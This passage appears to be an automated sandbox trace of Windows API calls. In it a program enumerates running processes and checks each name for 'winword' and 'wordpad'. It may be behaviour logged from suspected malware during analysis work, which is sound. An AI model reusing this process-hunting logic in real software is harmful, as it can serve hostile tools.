lpUsedDefaultChar=0x0) returned 12 [0100.517] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0100.517] StrStrIA (lpFirst="dllhost.exe", lpSrch="winword") returned 0x0 [0100.517] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0100.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.543] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356dc68 [0100.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x356dc68, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0100.543] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0100.543] StrStrIA (lpFirst="taskhostw.exe", lpSrch="winword") returned 0x0 [0100.543] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0100.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.545] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356dc80 [0100.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x356dc80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0100.545] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0100.545] StrStrIA (lpFirst="UsoClient.exe", lpSrch="winword") returned 0x0 [0100.545] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0100.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.546] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356dc98 [0100.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x356dc98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0100.546] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0100.546] StrStrIA (lpFirst="taskhostw.exe", lpSrch="winword") returned 0x0 [0100.546] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0100.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0100.548] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x357d1a8 [0100.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x357d1a8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0100.548] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0100.548] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="winword") returned 0x0 [0100.548] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0100.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.549] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357d1e8 [0100.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x357d1e8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0100.549] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0100.549] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="winword") returned 0x0 [0100.549] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0100.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0100.551] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356bf78 [0100.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x356bf78, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0100.551] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0100.551] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="winword") returned 0x0 [0100.551] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0100.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.552] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356dcc8 [0100.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x356dcc8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.552] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0100.552] StrStrIA (lpFirst="conhost.exe", lpSrch="winword") returned 0x0 [0100.553] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0100.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.554] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356dce0 [0100.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x356dce0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.554] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0100.554] StrStrIA (lpFirst="conhost.exe", lpSrch="winword") returned 0x0 [0100.554] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0100.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.555] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356dd28 [0100.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x356dd28, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0100.555] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0100.555] StrStrIA (lpFirst="rxodge.exe", lpSrch="winword") returned 0x0 [0100.555] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0100.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.557] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356dea8 [0100.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x356dea8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0100.557] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0100.557] StrStrIA (lpFirst="sppsvc.exe", lpSrch="winword") returned 0x0 [0100.557] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0100.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.558] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357d288 [0100.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x357d288, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0100.558] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0100.558] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="winword") returned 0x0 [0100.558] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 1 [0100.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.559] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356de18 [0100.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x356de18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TiWorker.exe", lpUsedDefaultChar=0x0) returned 13 [0100.559] lstrcpyA (in: lpString1=0x567fabc, lpString2="TiWorker.exe" | out: lpString1="TiWorker.exe") returned="TiWorker.exe" [0100.559] StrStrIA (lpFirst="TiWorker.exe", lpSrch="winword") returned 0x0 [0100.559] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 0 [0100.560] CloseHandle (hObject=0x358) returned 1 [0100.560] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x350 [0100.586] Process32FirstW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.587] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357d408 [0100.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x357d408, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0100.588] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0100.588] StrStrIA (lpFirst="[System Process]", lpSrch="wordpad") returned 0x0 [0100.588] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0100.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0100.589] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x357e0f8 [0100.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x357e0f8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0100.589] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0100.589] StrStrIA (lpFirst="System", lpSrch="wordpad") returned 0x0 [0100.589] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0100.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0100.590] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356def0 [0100.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x356def0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0100.590] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0100.590] StrStrIA (lpFirst="smss.exe", lpSrch="wordpad") returned 0x0 [0100.590] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0100.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.591] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356df08 [0100.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x356df08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0100.591] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0100.591] StrStrIA (lpFirst="csrss.exe", lpSrch="wordpad") returned 0x0 [0100.591] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0100.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.593] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356df98 [0100.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x356df98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0100.593] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0100.593] StrStrIA (lpFirst="wininit.exe", lpSrch="wordpad") returned 0x0 [0100.593] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0100.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.594] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356df68 [0100.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x356df68, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0100.594] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0100.594] StrStrIA (lpFirst="csrss.exe", lpSrch="wordpad") returned 0x0 [0100.594] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0100.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.595] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356dfb0 [0100.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x356dfb0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0100.596] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0100.596] StrStrIA (lpFirst="winlogon.exe", lpSrch="wordpad") returned 0x0 [0100.596] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0100.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.597] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356de60 [0100.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x356de60, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0100.597] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0100.597] StrStrIA (lpFirst="services.exe", lpSrch="wordpad") returned 0x0 [0100.597] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0100.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.599] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356de78 [0100.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x356de78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0100.599] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0100.599] StrStrIA (lpFirst="lsass.exe", lpSrch="wordpad") returned 0x0 [0100.599] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.600] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356dff8 [0100.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356dff8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.600] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.600] StrStrIA (lpFirst="svchost.exe", lpSrch="wordpad") returned 0x0 [0100.600] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0100.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 